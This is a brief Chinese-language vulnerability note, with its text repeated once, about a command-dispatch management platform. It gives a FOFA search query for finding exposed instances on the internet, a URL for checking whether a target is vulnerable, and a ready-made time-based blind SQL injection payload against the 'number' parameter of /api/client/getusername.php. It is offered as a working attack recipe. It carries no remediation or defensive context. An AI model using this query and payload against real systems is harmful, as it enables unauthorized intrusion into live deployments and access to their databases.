0x01 fofa语句
app="指挥调度管理平台"
0x02 漏洞检测
访问url,返回空页面表示可能存在
/api/client/getusername.php
0x03 漏洞复现
sql注入漏洞,可注入参数
/api/client/getusername.php?number=1%20AND%20(SELECT%205443%20FROM%20(SELECT(SLEEP(10)))FIjE)
app="指挥调度管理平台"
访问url,返回空页面表示可能存在
/api/client/getusername.php
sql注入漏洞,可注入参数
/api/client/getusername.php?number=1%20AND%20(SELECT%205443%20FROM%20(SELECT(SLEEP(10)))FIjE)